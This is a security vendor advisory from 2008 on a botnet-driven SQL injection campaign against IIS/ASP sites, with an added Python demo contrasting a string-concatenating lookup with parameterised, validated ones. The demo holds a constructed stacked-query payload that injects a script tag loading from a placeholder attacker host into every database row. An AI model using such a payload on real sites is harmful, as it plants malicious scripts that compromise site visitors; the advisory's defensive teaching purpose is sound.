Network Box Monitors Global Release of an SQL Injection Attack (via botnet)

23/6/08

Over the past few days, Network Box has been monitoring an increase in targeted SQL injection attacks against websites. So far this appears to affect only certain versions of the Microsoft IIS web server running Active Server Pages (ASP) scripts against Microsoft SQL Server. The attacker attempts to modify records in the websites' SQL databases.

Wikipedia defines SQL Injection as: a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

These forms of attack are extremely hard to stop at the gateway: the attacks are application dependent, so generic IDP/IDS rules can provide only limited defence. Network Box has a number of IDP rules in place, but these guard only against specific, known attack patterns, which may be too late when a 0-day targeted attack hits a web server. Application-level security, by way of strict input validation and parameterised queries, is ultimately the only way to thwart this type of attack at the server itself.
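As an added example (not code from the original advisory or from Network Box), the following shows the vulnerability class defined above and the server-side fix recommended here: a lookup page that concatenates a request parameter into its SQL, beside the same lookup done with input validation and a bound parameter. The table, rows, attacker host name (attacker.example) and payload are all constructed for the demonstration. SQLite is used in place of SQL Server; because Python's sqlite3 `execute()` refuses stacked statements, the vulnerable path uses `executescript()` to mimic an ADO connection to SQL Server, which does run them.

```python
import sqlite3


def make_db():
    """Constructed sample data: a small news table of the kind mass
    SQL-injection campaigns tamper with. Not taken from the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles (title, body) VALUES ('Welcome', 'Hello world');
        INSERT INTO articles (title, body) VALUES ('News', 'Second post');
    """)
    return conn


# Constructed attacker payload for an 'id' request parameter. The semicolon
# stacks an UPDATE behind the intended SELECT, appending a script tag to every
# row; the trailing '--' comments out anything the page appends afterwards.
# 'attacker.example' is a placeholder host, not a real indicator.
PAYLOAD = ("1; UPDATE articles SET body = body || "
           "'<script src=\"http://attacker.example/x.js\"></script>'; --")


def lookup_vulnerable(conn, article_id):
    """Builds SQL by string concatenation, as a classic ASP page often did.
    executescript() stands in for a driver that executes stacked statements."""
    sql = "SELECT id, title FROM articles WHERE id = " + article_id
    conn.executescript(sql)
    conn.commit()
    return sql


def lookup_param_only(conn, article_id):
    """Bound parameter, no validation: the value is compared, never parsed as
    SQL, so the payload simply matches no row."""
    cur = conn.execute("SELECT id, title FROM articles WHERE id = ?",
                       (article_id,))
    return cur.fetchall()


def lookup_safe(conn, article_id):
    """Strict input validation plus a bound parameter: the fix the advisory
    asks for at the application layer."""
    if not article_id.isdigit():
        raise ValueError("article id must be a positive integer")
    cur = conn.execute("SELECT id, title FROM articles WHERE id = ?",
                       (int(article_id),))
    return cur.fetchall()


def bodies(conn):
    return [row[0] for row in conn.execute("SELECT body FROM articles ORDER BY id")]


def demo():
    """Runs the payload through each path and reports what happened."""
    results = {}

    conn = make_db()
    lookup_vulnerable(conn, PAYLOAD)
    # Every row now carries the injected script tag.
    results["vulnerable_tampered"] = all("<script" in b for b in bodies(conn))

    conn = make_db()
    results["param_only"] = lookup_param_only(conn, PAYLOAD)
    results["param_only_intact"] = not any("<script" in b for b in bodies(conn))

    conn = make_db()
    try:
        lookup_safe(conn, PAYLOAD)
        results["safe_rejected"] = False
    except ValueError:
        results["safe_rejected"] = True
    results["safe_intact"] = not any("<script" in b for b in bodies(conn))
    results["safe_normal"] = lookup_safe(conn, "1")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two hardened functions make the point separately: the bound parameter alone stops the injected statement from ever being parsed as SQL, and the integer check on top of it rejects the request outright, which is what a gateway signature can only approximate.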

Starting June 20th, around midday GMT, Network Box Security Response observed a dramatic increase in malicious activity. We are now recording blocks (as HTTP-S-SQLINJWORM) across all continents and from over 40 source countries. A major botnet of at least 4,000 compromised hosts appears to be responsible for these attacks.

In response to this heightened activity, Network Box Security Response has increased our global threat level indicator to alert condition 3. We continue to closely monitor the situation, and will further refine and improve our protection signatures and heuristics, as we see the attacks change.

However, we do recommend that customers operating web servers accessible from the Internet review the scripts and applications on those servers and ensure they are up to date and patched, so as not to be vulnerable to this class of attack.
